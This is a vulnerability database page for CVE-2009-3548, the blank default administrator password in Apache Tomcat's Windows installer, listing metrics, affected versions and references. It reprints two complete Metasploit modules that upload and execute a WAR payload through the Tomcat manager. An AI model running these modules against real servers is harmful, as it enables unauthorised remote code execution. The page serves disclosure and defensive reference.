CVE-2009-3548 : Detail

CVE-2009-3548

A07-Identif. and Authent. Fail
24.09%V3
Network
2009-11-12
22h00 +00:00
2020-02-13
15h08 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-255 Category : Credentials Management Errors
Weaknesses in this category are related to the management of credentials.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 16317

Publication date : 2010-12-13 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: tomcat_mgr_deploy.rb 11330 2010-12-14 17:26:44Z egypt $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Tomcat Manager Application Deployer Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11330 $', 'References' => [ # There is no single vulnerability associated with deployment functionality. # Instead, the focus has been on insecure/blank/hardcoded default passwords. # The following references refer to HP Operations Manager [ 'CVE', '2009-3843' ], [ 'OSVDB', '60317' ], [ 'CVE', '2009-4189' ], [ 'OSVDB', '60670' ], # HP Operations Dashboard [ 'CVE', '2009-4188' ], # IBM Cognos Express Default user/pass [ 'BID', '38084' ], [ 'CVE', '2010-0557' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ], # IBM Rational Quality Manager and Test Lab Manager [ 'CVE', '2010-4094' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-214/' ], # 'admin' password is blank in default Windows installer [ 'CVE', '2009-3548' ], [ 'OSVDB', '60176' ], [ 'BID', '36954' ], # tomcat docs [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] ], 'Platform' => [ 'java', 'win', 'linux' ], # others? 'Targets' => [ # # detect via /manager/serverinfo # [ 'Automatic', { } ], [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ], # # Platform specific targets only # [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' }, ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 09 2009')) register_options( [ OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), # /cognos_express/manager/ for Cognos Express (19300) OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager']) ], self.class) end def auto_target print_status("Attempting to automatically select a target...") res = query_serverinfo() return nil if not res plat = detect_platform(res.body) arch = detect_arch(res.body) # No arch or platform found? if (not arch or not plat) return nil end # see if we have a match targets.each { |t| if (t['Platform'] == plat) and (t['Arch'] == arch) return t end } # no matching target found return nil end def exploit datastore['BasicAuthUser'] = datastore['USERNAME'] datastore['BasicAuthPass'] = datastore['PASSWORD'] mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target if (not mytarget) raise RuntimeError, "Unable to automatically select a target" end print_status("Automatically selected target \"#{mytarget.name}\"") else print_status("Using manually select target \"#{mytarget.name}\"") end # We must regenerate the payload in case our auto-magic changed something. p = exploit_regenerate_payload(mytarget.platform, mytarget.arch) # Generate the WAR containing the EXE containing the payload jsp_name = rand_text_alphanumeric(4+rand(32-4)) app_base = rand_text_alphanumeric(4+rand(32-4)) # Generate the WAR containing the payload war = p.encoded_war({ :app_name => app_base, :jsp_name => jsp_name, :arch => mytarget.arch, :platform => mytarget.platform }).to_s query_str = "?path=/" + app_base # # UPLOAD # path_tmp = datastore['PATH'] + "/deploy" + query_str print_status("Uploading #{war.length} bytes as #{app_base}.war ...") res = send_request_cgi({ 'uri' => path_tmp, 'method' => 'PUT', 'ctype' => 'application/octet-stream', 'data' => war, }, 20) if (! res) raise RuntimeError, "Upload failed on #{path_tmp} [No Response]" end if (res.code < 200 or res.code >= 300) case res.code when 401 print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") end raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]" end # # EXECUTE # jsp_path = '/' + app_base + '/' + jsp_name + '.jsp' print_status("Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, 'method' => 'GET' }, 20) if (! res) print_error("Execution failed on #{app_base} [No Response]") elsif (res.code < 200 or res.code >= 300) print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]") print_status(res.body) if datastore['VERBOSE'] end # # DELETE # path_tmp = datastore['PATH'] + "/undeploy" + query_str print_status("Undeploying #{app_base} ...") res = send_request_cgi({ 'uri' => path_tmp, 'method' => 'GET' }, 20) if (! res) print_error("WARNING: Undeployment failed on #{path} [No Response]") elsif (res.code < 200 or res.code >= 300) print_error("Deletion failed on #{path} [#{res.code} #{res.message}]") end handler end def query_serverinfo() path = datastore['PATH'] + '/serverinfo' res = send_request_raw( { 'uri' => path }, 10) if (not res) or (res.code != 200) print_error("Failed: Error requesting #{path}") return nil end print_status(res.body) if datastore['VERBOSE'] return res end def detect_platform(body = nil) if not body res = query_serverinfo() return nil if not res body = res.body end body.each_line { |ln| ln.chomp! case ln when /OS Name: / os = ln.split(':')[1] case os when /Windows/ return 'win' when /Linux/ return 'linux' end end } end def detect_arch(body) body.each_line { |ln| ln.chomp! case ln when /OS Architecture: / ar = ln.split(':')[1].strip case ar when 'x86', 'i386', 'i686' return ARCH_X86 when 'x86_64', 'amd64' return ARCH_X86 end end } end end
Exploit Database EDB-ID : 31433

Publication date : 2014-02-04 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } CSRF_VAR = 'CSRF_NONCE=' include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution', 'Description' => %q{ This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads. }, 'Author' => 'rangercha', 'License' => MSF_LICENSE, 'References' => [ # This is based on jduck's tomcat_mgr_deploy. # the tomcat_mgr_deploy o longer works for current versions of tomcat due to # CSRF protection tokens. Also PUT requests against the /manager/html/deploy # aren't allowed anymore. # There is no single vulnerability associated with deployment functionality. # Instead, the focus has been on insecure/blank/hardcoded default passwords. # The following references refer to HP Operations Manager ['CVE', '2009-3843'], ['OSVDB', '60317'], ['CVE', '2009-4189'], ['OSVDB', '60670'], # HP Operations Dashboard ['CVE', '2009-4188'], # IBM Cognos Express Default user/pass ['BID', '38084'], ['CVE', '2010-0557'], ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'], # IBM Rational Quality Manager and Test Lab Manager ['CVE', '2010-4094'], ['ZDI', '10-214'], # 'admin' password is blank in default Windows installer ['CVE', '2009-3548'], ['OSVDB', '60176'], ['BID', '36954'], # tomcat docs ['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html'] ], 'Platform' => %w{ java linux win }, # others? 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ], # # Platform specific targets only # [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 09 2009')) register_options( [ OptString.new('USERNAME', [false, 'The username to authenticate as']), OptString.new('PASSWORD', [false, 'The password for the specified username']), # /cognos_express/manager/ for Cognos Express (19300) OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager']) ], self.class) end def check res = query_manager disconnect return CheckCode::Unknown if res.nil? if res.code.between?(400, 499) vprint_error("#{peer} - Server rejected the credentials") return CheckCode::Unknown end return CheckCode::Safe unless res.code == 200 # if res.code == 200 # there should be access to the Tomcat Manager and to the status page res = query_status return CheckCode::Unknown unless res plat = detect_platform(res.body) arch = detect_arch(res.body) return CheckCode::Unknown unless plat and arch vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture") report_auth_info( :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), :user => datastore['USERNAME'], :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) return CheckCode::Appears end def exploit @app_base = rand_text_alphanumeric(4 + rand(32 - 4)) @jsp_name = rand_text_alphanumeric(4 + rand(32 - 4)) # # Find the session ID and the CSRF token # print_status("#{peer} - Retrieving session ID and CSRF token...") unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end # # Upload Payload # print_status("#{peer} - Uploading and deploying #{@app_base}...") if upload_payload report_auth_info( :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), :user => datastore['USERNAME'], :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) else fail_with(Failure::Unknown, "Upload failed") end # # Execute Payload # print_status("#{peer} - Executing #{@app_base}...") unless execute_payload fail_with(Failure::Unknown, "Failed to execute the payload") end # # Get the new CSRF token & session id # unless access_manager? fail_with(Failure::Unknown, "Unable to access the Tomcat Manager") end # # Delete the deployed payload # print_status("#{peer} - Undeploying #{@app_base} ...") unless undeploy_app print_warning("#{peer} - Failed to undeploy #{@app_base}...") end end def query_status path = normalize_uri(target_uri.path.to_s, 'status') res = send_request_raw('uri' => path) unless res and res.code == 200 vprint_error("Failed: Error requesting #{path}") return nil end return res end def query_manager path = normalize_uri(target_uri.path.to_s, '/html') res = send_request_raw('uri' => path) return res end def vars_get vars = {} unless @csrf_token.nil? vars = { "path" => @app_base, "org.apache.catalina.filters.CSRF_NONCE" => @csrf_token } end return vars end def detect_platform(body) return nil if body.blank? i=0 body.each_line do |ln| ln.chomp! i = 1 if ln =~ /OS Name/ if i == 9 or i == 11 if ln.include? "Windows" return 'win' elsif ln.include? "Linux" return 'linux' elsif i==11 return 'unknown' end end i = i+1 if i > 0 end end def detect_arch(body) return nil if body.blank? i=0 body.each_line do |ln| ln.chomp! i = 1 if ln =~ /OS Architecture/ if i==9 or i==11 if ln.include? 'x86' return ARCH_X86 elsif ln.include? 'i386' return ARCH_X86 elsif ln.include? 'i686' return ARCH_X86 elsif ln.include? 'x86_64' return ARCH_X86 elsif ln.include? 'amd64' return ARCH_X86 elsif i==11 return 'unknown' end end i = i + 1 if i > 0 end end def find_csrf(res = nil) return "" if res.blank? vprint_status("#{peer} - Finding CSRF token...") body = res.body body.each_line do |ln| ln.chomp! csrf_nonce = ln.index(CSRF_VAR) next if csrf_nonce.nil? token = ln[csrf_nonce + CSRF_VAR.length, 32] return token end return "" end def generate_multipart_msg(boundary, data) # Rex::MIME::Message is breaking the binary upload when trying to # enforce CRLF for SMTP compatibility war_multipart = "-----------------------------" war_multipart << boundary war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\"" war_multipart << @app_base war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n" war_multipart << data war_multipart << "\r\n-----------------------------" war_multipart << boundary war_multipart << "--\r\n" end def war_payload payload.encoded_war({ :app_name => @app_base, :jsp_name => @jsp_name, :arch => target.arch, :platform => target.platform }).to_s end def send_war_payload(url, war) boundary_identifier = rand_text_numeric(28) res = send_request_cgi({ 'uri' => url, 'method' => 'POST', 'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier, 'user' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'cookie' => @session_id, 'vars_get' => vars_get, 'data' => generate_multipart_msg(boundary_identifier, war), }) return res end def send_request_undeploy(url) res = send_request_cgi({ 'uri' => url, 'vars_get' => vars_get, 'method' => 'POST', 'user' => datastore['USERNAME'], 'password' => datastore['PASSWORD'], 'cookie' => @session_id }) return res end def access_manager? res = query_manager return false unless res and res.code == 200 @session_id = res.get_cookies @csrf_token = find_csrf(res) return true end def upload_payload war = war_payload upload_path = normalize_uri(target_uri.path.to_s, "html", "upload") vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...") res = send_war_payload(upload_path, war) return parse_upload_response(res) end def parse_upload_response(res) unless res vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]") return false end if res.code < 200 or res.code >= 300 vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401 vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]") return false end return true end def execute_payload jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp") vprint_status("#{peer} - Executing #{jsp_path}...") res = send_request_cgi({ 'uri' => jsp_path, 'method' => 'GET' }) return parse_execute_response(res) end def parse_execute_response(res) unless res vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]") return false end return true end def undeploy_app undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy") res = send_request_undeploy(undeploy_url) unless res vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]") return false end if res and (res.code < 200 or res.code >= 300) vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]") return false end return true end end

Products Mentioned

Configuraton 0

Apache>>Tomcat >> Version 3.0

Apache>>Tomcat >> Version 3.1

Apache>>Tomcat >> Version 3.1.1

Apache>>Tomcat >> Version 3.2

Apache>>Tomcat >> Version 3.2.1

Apache>>Tomcat >> Version 3.2.2

Apache>>Tomcat >> Version 3.2.2

Apache>>Tomcat >> Version 3.2.3

Apache>>Tomcat >> Version 3.2.4

Apache>>Tomcat >> Version 3.3

Apache>>Tomcat >> Version 3.3.1

Apache>>Tomcat >> Version 3.3.1a

Apache>>Tomcat >> Version 3.3.2

Apache>>Tomcat >> Version 4.0.0

Apache>>Tomcat >> Version 4.0.1

Apache>>Tomcat >> Version 4.0.2

Apache>>Tomcat >> Version 4.0.3

Apache>>Tomcat >> Version 4.0.4

Apache>>Tomcat >> Version 4.0.5

Apache>>Tomcat >> Version 4.0.6

Apache>>Tomcat >> Version 4.1.0

Apache>>Tomcat >> Version 4.1.1

Apache>>Tomcat >> Version 4.1.2

Apache>>Tomcat >> Version 4.1.3

Apache>>Tomcat >> Version 4.1.3

Apache>>Tomcat >> Version 4.1.4

Apache>>Tomcat >> Version 4.1.5

Apache>>Tomcat >> Version 4.1.6

Apache>>Tomcat >> Version 4.1.7

    Apache>>Tomcat >> Version 4.1.8

    Apache>>Tomcat >> Version 4.1.9

    Apache>>Tomcat >> Version 4.1.9

    Apache>>Tomcat >> Version 4.1.10

    Apache>>Tomcat >> Version 4.1.11

    Apache>>Tomcat >> Version 4.1.12

    Apache>>Tomcat >> Version 4.1.13

    Apache>>Tomcat >> Version 4.1.14

    Apache>>Tomcat >> Version 4.1.15

    Apache>>Tomcat >> Version 4.1.16

    Apache>>Tomcat >> Version 4.1.17

    Apache>>Tomcat >> Version 4.1.18

    Apache>>Tomcat >> Version 4.1.19

    Apache>>Tomcat >> Version 4.1.20

    Apache>>Tomcat >> Version 4.1.21

    Apache>>Tomcat >> Version 4.1.22

    Apache>>Tomcat >> Version 4.1.23

    Apache>>Tomcat >> Version 4.1.24

    Apache>>Tomcat >> Version 4.1.25

    Apache>>Tomcat >> Version 4.1.26

    Apache>>Tomcat >> Version 4.1.27

    Apache>>Tomcat >> Version 4.1.28

    Apache>>Tomcat >> Version 4.1.29

    Apache>>Tomcat >> Version 4.1.30

    Apache>>Tomcat >> Version 4.1.31

    Apache>>Tomcat >> Version 4.1.32

    Apache>>Tomcat >> Version 4.1.33

    Apache>>Tomcat >> Version 4.1.34

      Apache>>Tomcat >> Version 4.1.35

      Apache>>Tomcat >> Version 4.1.36

      Apache>>Tomcat >> Version 4.1.37

      Apache>>Tomcat >> Version 4.1.38

      Apache>>Tomcat >> Version 4.1.39

      Apache>>Tomcat >> Version 5.0.0

      Apache>>Tomcat >> Version 5.0.1

      Apache>>Tomcat >> Version 5.0.2

      Apache>>Tomcat >> Version 5.0.3

      Apache>>Tomcat >> Version 5.0.4

      Apache>>Tomcat >> Version 5.0.5

      Apache>>Tomcat >> Version 5.0.6

      Apache>>Tomcat >> Version 5.0.7

      Apache>>Tomcat >> Version 5.0.8

      Apache>>Tomcat >> Version 5.0.9

      Apache>>Tomcat >> Version 5.0.10

      Apache>>Tomcat >> Version 5.0.11

      Apache>>Tomcat >> Version 5.0.12

      Apache>>Tomcat >> Version 5.0.13

      Apache>>Tomcat >> Version 5.0.14

      Apache>>Tomcat >> Version 5.0.15

      Apache>>Tomcat >> Version 5.0.16

      Apache>>Tomcat >> Version 5.0.17

      Apache>>Tomcat >> Version 5.0.18

      Apache>>Tomcat >> Version 5.0.19

      Apache>>Tomcat >> Version 5.0.21

      Apache>>Tomcat >> Version 5.0.22

      Apache>>Tomcat >> Version 5.0.23

      Apache>>Tomcat >> Version 5.0.24

      Apache>>Tomcat >> Version 5.0.25

      Apache>>Tomcat >> Version 5.0.26

      Apache>>Tomcat >> Version 5.0.27

      Apache>>Tomcat >> Version 5.0.28

      Apache>>Tomcat >> Version 5.0.29

      Apache>>Tomcat >> Version 5.0.30

      Apache>>Tomcat >> Version 5.5.0

      Apache>>Tomcat >> Version 5.5.1

      Apache>>Tomcat >> Version 5.5.2

      Apache>>Tomcat >> Version 5.5.3

      Apache>>Tomcat >> Version 5.5.4

      Apache>>Tomcat >> Version 5.5.5

      Apache>>Tomcat >> Version 5.5.6

      Apache>>Tomcat >> Version 5.5.7

      Apache>>Tomcat >> Version 5.5.8

      Apache>>Tomcat >> Version 5.5.9

      Apache>>Tomcat >> Version 5.5.10

      Apache>>Tomcat >> Version 5.5.11

      Apache>>Tomcat >> Version 5.5.12

      Apache>>Tomcat >> Version 5.5.13

      Apache>>Tomcat >> Version 5.5.14

      Apache>>Tomcat >> Version 5.5.15

      Apache>>Tomcat >> Version 5.5.16

      Apache>>Tomcat >> Version 5.5.17

      Apache>>Tomcat >> Version 5.5.18

      Apache>>Tomcat >> Version 5.5.19

      Apache>>Tomcat >> Version 5.5.20

      Apache>>Tomcat >> Version 5.5.21

      Apache>>Tomcat >> Version 5.5.22

      Apache>>Tomcat >> Version 5.5.23

      Apache>>Tomcat >> Version 5.5.24

      Apache>>Tomcat >> Version 5.5.25

      Apache>>Tomcat >> Version 5.5.26

      Apache>>Tomcat >> Version 5.5.27

      Apache>>Tomcat >> Version 5.5.28

      Apache>>Tomcat >> Version 6.0

      Apache>>Tomcat >> Version 6.0.0

      Apache>>Tomcat >> Version 6.0.1

      Apache>>Tomcat >> Version 6.0.2

      Apache>>Tomcat >> Version 6.0.3

      Apache>>Tomcat >> Version 6.0.4

      Apache>>Tomcat >> Version 6.0.5

      Apache>>Tomcat >> Version 6.0.6

      Apache>>Tomcat >> Version 6.0.7

      Apache>>Tomcat >> Version 6.0.8

      Apache>>Tomcat >> Version 6.0.9

      Apache>>Tomcat >> Version 6.0.10

      Apache>>Tomcat >> Version 6.0.11

      Apache>>Tomcat >> Version 6.0.12

      Apache>>Tomcat >> Version 6.0.13

      Apache>>Tomcat >> Version 6.0.14

      Apache>>Tomcat >> Version 6.0.15

      Apache>>Tomcat >> Version 6.0.16

      Apache>>Tomcat >> Version 6.0.17

      Apache>>Tomcat >> Version 6.0.18

      Apache>>Tomcat >> Version 6.0.20

      References

      http://marc.info/?l=bugtraq&m=127420533226623&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://marc.info/?l=bugtraq&m=136485229118404&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://secunia.com/advisories/40330
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://marc.info/?l=bugtraq&m=127420533226623&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://www.vupen.com/english/advisories/2010/1559
      Tags : vdb-entry, x_refsource_VUPEN
      http://marc.info/?l=bugtraq&m=133469267822771&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://secunia.com/advisories/57126
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securityfocus.com/bid/36954
      Tags : vdb-entry, x_refsource_BID
      http://marc.info/?l=bugtraq&m=133469267822771&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://www.vupen.com/english/advisories/2009/3185
      Tags : vdb-entry, x_refsource_VUPEN
      http://marc.info/?l=bugtraq&m=136485229118404&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://marc.info/?l=bugtraq&m=139344343412337&w=2
      Tags : vendor-advisory, x_refsource_HP
      http://www.securitytracker.com/id?1023146
      Tags : vdb-entry, x_refsource_SECTRACK